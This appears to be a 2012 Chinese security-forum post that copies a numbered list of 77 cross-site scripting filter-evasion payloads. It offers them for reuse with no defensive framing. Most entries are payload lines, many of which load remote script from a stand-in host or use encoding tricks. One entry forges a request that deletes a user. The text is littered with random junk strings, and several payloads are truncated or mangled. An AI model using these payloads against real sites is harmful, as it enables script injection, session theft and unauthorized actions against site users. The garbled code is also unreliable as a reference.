貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。6 X$ j$ r+ P( [- E+ e
0 R0 n* a" ^0 E# d8 G
(1)普通的XSS JavaScript注入- c5 j/ r% A8 }4 d/ p+ G
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
! J A' Q& {& ]9 a4 \3 h, `, K+ w& \- [$ v( I) b
(2)IMG标签XSS使用JavaScript命令
3 K, o- | z) F/ S2 l <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 R {$ P% {2 y/ ?; C, S+ u
( }# d' f8 }& p! D (3)IMG标签无分号无引号! o2 j0 u$ q' s( [7 x# A, b
<IMG SRC=javascript:alert(‘XSS’)>
7 ~- B8 ?9 e9 ?3 p
5 D' S/ E: q8 M. C! M/ {0 ^ (4)IMG标签大小写不敏感
% P. J, L7 G" A) W: Z <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
* T# \7 [7 }( j
. w s, S7 t8 T) } (5)HTML编码(必须有分号)+ N0 z4 W: Z2 e) a- P" d9 N i
<IMG SRC=javascript:alert(“XSS”)># |/ T7 M; k+ R8 ~% u9 ]
, p; \8 G4 D# t8 d/ Q (6)修正缺陷IMG标签
8 Z- h3 {( S% F. A0 ^% O; b$ l <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>7 N, V# R# S$ {- P( X
3 ^. d0 d2 {3 x# _( |1 K" X (7)formCharCode标签(计算器)
& v j" j# b: ?5 H& |- }; ~0 z <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>0 r, {" W/ }0 g2 e, E; H' j
* G9 y p2 f$ Q" K- P* R. m# g# D' C (8)UTF-8的Unicode编码(计算器)% u" q( e* K9 w
<IMG SRC=jav..省略..S')>
. ]+ u8 U8 S/ g7 ^3 c
: T; l2 d: x _( l( g, c. q' }7 | (9)7位的UTF-8的Unicode编码是没有分号的(计算器). q( k$ u# I, Y6 P+ a( M" I
<IMG SRC=jav..省略..S')>3 M! N: y* e \ s2 p8 J" ?
' c# t- S2 s* c2 r' Y (10)十六进制编码也是没有分号(计算器)
+ b5 l7 M6 i' t& {1 e4 ` <IMG SRC=java..省略..XSS')>4 y# C9 F2 Y; |3 q/ g! o
1 ?! P4 n5 ?) F3 h9 |( O4 }$ `
(11)嵌入式标签,将Javascript分开
9 g" Z+ b: o ?9 m" L& _$ ~ <IMG SRC=”jav ascript:alert(‘XSS’);”>
- o y7 P: F* W2 p) O* K. ?# l# R3 ]
(12)嵌入式编码标签,将Javascript分开
9 N; e' U7 r# G) ~ <IMG SRC=”jav ascript:alert(‘XSS’);”>) t! w# {" j7 @, b0 h5 U
4 c& S) r; O3 J% p0 R
(13)嵌入式换行符
. P/ o. ~ X* j& z+ b <IMG SRC=”jav ascript:alert(‘XSS’);”>
P, O- H# `& q( G' ~ u/ V( y: k
(14)嵌入式回车- |9 N. E+ U# p& T) C
<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 D9 s8 X! z- e/ B0 O7 h$ k
a+ c: S. P! @* N" ] (15)嵌入式多行注入JavaScript,这是XSS极端的例子) N B7 M! s) J- q8 ^- G; y8 q( I
<IMG SRC=”javascript:alert(‘XSS‘)”># t( A* u( q( [) d' C: x
* \9 t! B* n& C' w! Z* e. t8 Y
(16)解决限制字符(要求同页面)
' ]7 D6 J# k1 n <script>z=’document.’</script>
o0 s. a7 F! t- d M <script>z=z+’write(“‘</script>( c6 W0 v" z! [: f6 A0 _/ Q
<script>z=z+’<script’</script>5 z0 f- F* j* B
<script>z=z+’ src=ht’</script># F8 _/ V4 T0 Y1 M( X) \
<script>z=z+’tp://ww’</script>
3 ^1 Q& d7 m* p4 A1 m" y <script>z=z+’w.shell’</script> H" y& V$ [! l- O5 k/ M
<script>z=z+’.net/1.’</script>' w, {7 p- W. [* Y& x( e2 Z3 a2 p
<script>z=z+’js></sc’</script>
h! B0 |5 a2 [ x: a" l9 q <script>z=z+’ript>”)’</script>
3 ^5 A9 s; `" U# W7 J <script>eval_r(z)</script>* j Q9 P5 j+ S* L
- R O, b7 B$ Q O9 }$ Q (17)空字符3 n: |+ l5 h7 l1 g2 R+ D1 e8 S
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
, ~1 m4 T* `9 q7 f5 x. F2 Q1 d) P/ `2 z w6 R
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
# Z( [7 `7 {$ E9 Z5 M/ J1 U perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
6 a% J/ a: Z4 s- t6 |5 x
5 ]1 j' H: U- h (19)Spaces和meta前的IMG标签
7 F- Y- p; w$ n6 G) K3 d/ U <IMG SRC=” � javascript:alert(‘XSS’);”>3 l# c# ?- u- w5 @
$ ]* u' h7 i: ~: Q: d: {8 G2 T' B (20)Non-alpha-non-digit XSS
v' ^, ?1 @, _3 y2 C6 } <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
$ V- R! k- T7 x, M# z; [0 S+ S) D$ W- U, ]/ T3 t. v. w/ n: S y
(21)Non-alpha-non-digit XSS to 2
2 x( [; z: E: T! f <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
# ]+ F, c4 K: S4 V1 `& n5 T2 X0 g7 C- C+ m* ^7 T) w& F$ c! w
(22)Non-alpha-non-digit XSS to 3: I- y2 t( Q% v% v
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
; S% B' Z- _; I2 ~+ o* V$ u5 D+ h- r" H" S7 M# f( I
(23)双开括号2 x! r7 _* p3 T; d1 t' B( }2 P g: e% N
<<SCRIPT>alert(“XSS”);//<</SCRIPT>& X. q+ |! [) S8 l% j/ q: W% T( \
, \, _+ F- v! |( B3 c, ?6 r
(24)无结束脚本标记(仅火狐等浏览器)9 c( \$ A( |* M! h% f
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>2 Z% T# g5 j4 z3 q4 G" K7 r
4 d) G8 B! A5 o% E/ ~8 Z7 [7 e
(25)无结束脚本标记2
' W7 r- m& A% G <SCRIPT SRC=//3w.org/XSS/xss.js>
" [9 h5 @; T- t5 S9 h- E5 C$ T* H5 K5 _* r' R( h) A
(26)半开的HTML/JavaScript XSS. Z0 D' B3 r+ ]5 z i! y
<IMG SRC=”javascript:alert(‘XSS’)”/ E6 J4 V: y6 U& f, ^
. M" q; E0 F+ g! D# E- ^; S (27)双开角括号2 d; n W/ m/ q9 S/ r$ W" T7 C
<iframe src=http://3w.org/XSS.html <$ i" Y( a* x, B
' N8 q6 l, t" A) S, L! B (28)无单引号 双引号 分号
9 Y) v* n+ |5 P9 F Y, ] <SCRIPT>a=/XSS/
]0 l \/ i: z3 b, Z alert(a.source)</SCRIPT>: T$ _0 l1 v. V6 Y# q0 J& S, z
, W5 ?$ ~5 u2 Y" S* u( g5 t1 s (29)换码过滤的JavaScript# X8 x: u5 q0 ?1 h2 ~) _
\”;alert(‘XSS’);//4 M @7 _$ y0 z& P0 O
% [* ?- x5 |: `8 x `* v4 R; z. n8 t (30)结束Title标签4 p4 O8 w& _: A8 ?7 a
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
0 L) u& Z; J, s( Y1 X
. d% b4 `0 d% s! o* h (31)Input Image
! U* p4 H/ ] v5 `* l L7 H5 n <INPUT SRC=”javascript:alert(‘XSS’);”>) ]: J3 N1 I2 V8 k( l
( o* |: D& E2 c: {6 l (32)BODY Image6 ]9 N& q1 m @: P! q, x% H1 {
<BODY BACKGROUND=”javascript:alert(‘XSS’)”># t6 w* F' g1 I' ~4 w O- Q" B
2 C2 l$ a: ?, C" ?1 }% f (33)BODY标签1 k% q0 q% M. T8 X! Z! c r5 _3 H9 R: C
<BODY(‘XSS’)>
3 d1 k3 z& d! {- z9 h) r8 p0 }1 S. G; W6 N
(34)IMG Dynsrc4 E/ P0 Q! D7 r6 J
<IMG DYNSRC=”javascript:alert(‘XSS’)”>) A: C" w; [ K, ^ ^0 X- W
4 U' m" i9 F( [4 u2 Q: X; R" }! J
(35)IMG Lowsrc
0 r h9 o2 h& \$ \ <IMG LOWSRC=”javascript:alert(‘XSS’)”>. m; N/ f3 P# J4 }2 x$ ^
2 Z+ O4 Q7 A0 ?7 { (36)BGSOUND
; f& Y3 o, o6 f$ N( r8 \; b <BGSOUND SRC=”javascript:alert(‘XSS’);”>- O2 c- c6 e& G) L: W3 b4 E$ i
% }$ j$ |$ _7 e3 }$ d X
(37)STYLE sheet
0 F% h# G0 r/ h( L" M8 M% \ <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
$ T' N* b" f/ V& e- \) _" c1 Q0 O
(38)远程样式表
, Y4 z7 T) w0 t8 `" l& ` <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>8 y. X1 s% t3 Y
- \& F0 N7 K, Y" ?* T( q
(39)List-style-image(列表式)
, X9 M$ I! {1 i" U. W& K' X# p9 X <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
- t. H! ?# X: h+ z* M2 t& [" ?8 A# Z
(40)IMG VBscript2 q9 J! ?6 s2 q
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
9 l& `) }; D3 t. G% M
) s3 j% i* p! s; L) V4 K7 L. o5 U (41)META链接url
: {- L9 R7 w, J( [' p2 @ <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
& q! \0 n2 w! l2 i& p9 F8 C& @7 |4 P; x) C$ B1 Q, W
(42)Iframe v5 J0 K8 v; ~
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
, c5 c. X7 F7 S9 X& @$ [
4 _2 R T) Q. C- P (43)Frame" u/ ^9 S/ ]% ?2 u) r: d. s
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>) t' z2 u) \3 R/ y- p; b
5 D5 L$ }' {/ d% u& o2 g+ n
(44)Table, z3 M( |' z% q2 @7 ~; V: u4 R8 n; F. Q
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
4 Q( B7 ^2 \8 d1 N7 e- p* T/ P; \0 U
(45)TD
* w0 O3 e/ c5 g+ t9 h- |3 U' S& D <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>9 j: v/ E5 i5 t c
& z9 N7 f6 Y1 f4 ]6 J
(46)DIV background-image
: U* i5 I, Y" i, X8 p$ ]) @3 }- G" x <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>. G- q! q% Q+ k
. [" }" {6 V D+ p" _7 C6 F0 k; h+ m
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)) l: | y2 b: `- M4 _
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>0 g3 p% l( n+ }2 e# y
+ B7 o5 u5 {3 A (48)DIV expression# _ b5 S6 |+ v( A) i5 @; b
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>( o6 q) y+ M) z; ~" l" j+ d
+ B: N# A& q3 v; {4 S/ q (49)STYLE属性分拆表达$ J/ H d$ P3 W- O) ^& x9 o- ^
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
7 o8 L' j4 A. t. b; r% O* }/ S3 i# j( ?8 X
(50)匿名STYLE(组成:开角号和一个字母开头)
, u! F4 m) F1 v. R <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>/ l7 R( p/ c6 Y. q, K& Z* F
( L2 _; E6 E% ]2 w7 g (51)STYLE background-image
% r' J$ e2 B" n* { <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
0 M( A% N9 X; m2 r. _5 ^3 s
- ` V5 ~* | y/ ` L9 R5 ] (52)IMG STYLE方式; V( l3 r$ B0 \: h: E$ F
exppression(alert(“XSS”))’>
& h1 ~+ s6 V7 N/ t* ^; G9 j4 m5 |7 E7 s* |
(53)STYLE background
5 W; P* x) m1 J# C* @* ]7 H% } <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>3 r. e) z& k" B _
+ o, c! O0 e$ p+ m/ @ (54)BASE
. Y# U1 V, `$ L8 @# `/ t, n <BASE HREF=”javascript:alert(‘XSS’);//”>
1 P+ q; ~9 g% ?. M ~5 t; t: P" H: j1 N( Q' s1 Y2 @1 ?7 w
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
6 `5 ]" n/ B7 ^0 Q* b; Z <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>% ^4 N b; o) A# G5 L f! _
2 j# y) |/ L) C) @6 Y2 F5 Z (56)在flash中使用ActionScrpt可以混进你XSS的代码: T' {1 _4 W7 a! T+ B. @; T4 v. g6 H
a=”get”;* v6 T# s$ E& h9 W% V6 y" u9 m
b=”URL(\”";
* | }* e2 z$ |2 N c=”javascript:”;- w8 j+ B, t& t, N# C
d=”alert(‘XSS’);\”)”;
. n' x* D- A4 R) c' {% p, S eval_r(a+b+c+d);( u" q* p" h5 s$ C1 a
) _# i& \ P( G. j1 ]2 o8 _& R
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上1 D1 s- H) A0 W z- M! b3 G9 k! I
<HTML xmlns:xss>
) C8 y$ ?: c {2 K0 F) @5 F* ?( y <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>7 A# d* x9 v. i) Y8 E$ m+ K
<xss:xss>XSS</xss:xss>
; f. c$ ~' k% d/ j% H# K </HTML>
* k0 G( b' U Z6 O1 c$ M+ ~: Y: P; i) w' X
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用. ?: t# _, L- a: N3 g/ i1 X+ o* `
<SCRIPT SRC=””></SCRIPT>
( D6 X, }: ?9 `5 S' Q r4 R& T9 a8 v2 C, q+ A
(59)IMG嵌入式命令,可执行任意命令
7 ^% W x4 G, g) M3 Z4 t+ O. O& x <IMG SRC=”http://www.XXX.com/a.php?a=b”>
* U9 g9 C7 D2 m. N- `3 h$ M5 K, R, ?1 I1 D
(60)IMG嵌入式命令(a.jpg在同服务器)7 ?6 Y' E; {8 S3 a
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
6 Q: g; H7 p& ~+ h t; e& A$ ?9 w6 Z- J p
(61)绕符号过滤
: @* r/ J# O* T" q) A <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
- Y- U2 S# U" p4 ` ?/ o4 [" V5 I6 Z' o
(62)
% E( s2 `& c N; g! ~! X2 [- R4 t b <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>4 k) q8 ?9 Q" x: n3 s1 q2 g! K
# h9 o3 c! u" i; u
(63)
$ |$ K% D" e3 C" D( ~ <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
' c9 t9 d% L$ u7 U7 [' W
5 F u5 n8 c3 q& d. [ (64)
; U$ ]& `9 P1 W: p <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
1 h s* g; h& I9 p' v5 r. L. X* |9 A/ r, d2 `
(65)9 O7 c1 U: S# y
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
7 ~4 \" y5 v& q
$ R7 O- W$ e/ k6 X; K (66)
1 c+ S+ t8 m. c6 N <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
8 _& G2 u( R- w1 l, U6 \7 y" N, _6 H1 _+ P1 h% o9 w4 {( K
(67)
8 Y+ K$ X$ k/ W3 P) R. S/ w <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>! D! B% [8 o$ i! m t1 d% Z, w
y' [! @) F0 V3 P& t- ]5 ^2 v (68)URL绕行# {+ t& ]7 V) u+ i7 _
<A HREF=”http://127.0.0.1/”>XSS</A>' p$ P. O/ V1 k4 | `
* B2 ~- X* ` d7 E4 F8 z
(69)URL编码5 ^/ g2 n1 r9 `
<A HREF=”http://3w.org”>XSS</A>* x/ K' y8 ^7 ^3 M* Z
& n- A. I) a. H) Q0 H# ~ (70)IP十进制
0 Y, [7 {" M5 h+ X* m+ K <A HREF=”http://3232235521″>XSS</A>
3 S- `$ X7 ~# Z- k! H" w e* @ S# p1 Q
(71)IP十六进制
! E* }# W0 f* s5 M5 @ <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
8 k- `8 k* r X* f/ K% G: D/ ]. K" G8 W
(72)IP八进制
4 O$ c0 l( R1 i <A HREF=”http://0300.0250.0000.0001″>XSS</A>
/ B$ l8 e$ S: t0 O1 M) ^' A8 ]% C" e1 f6 e0 Z; f% U) s8 }9 a
(73)混合编码
8 P! g' `3 S c+ q& ?8 }7 I7 L) | <A HREF=”h
' ?9 t% `+ P0 \: O& l6 ? `, @; z. Q& \ tt p://6 6.000146.0×7.147/”">XSS</A>
5 S6 ~& n$ Y$ ~: B0 C8 w% a) N% q* J1 J; l" q+ ?
(74)节省[http:]' p. f' r/ H0 v2 R6 Z# c3 r
<A HREF=”//www.google.com/”>XSS</A>. y" o! H- D- I: ^1 `
2 u/ f1 t) s/ K8 H: r' ?9 j' B
(75)节省[www]
4 K; [4 ?3 l4 `' P <A HREF=”http://google.com/”>XSS</A>
M7 D5 O4 U* d7 }2 J0 i# }( V- D( n% K0 w& f6 N
(76)绝对点绝对DNS! n# L6 Y4 c- U- p
<A HREF=”http://www.google.com./”>XSS</A>& F6 P. r! t6 H( W
3 R U5 A* X9 h7 |5 y (77)javascript链接
0 `* X' d+ f0 K2 N7 L6 e <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对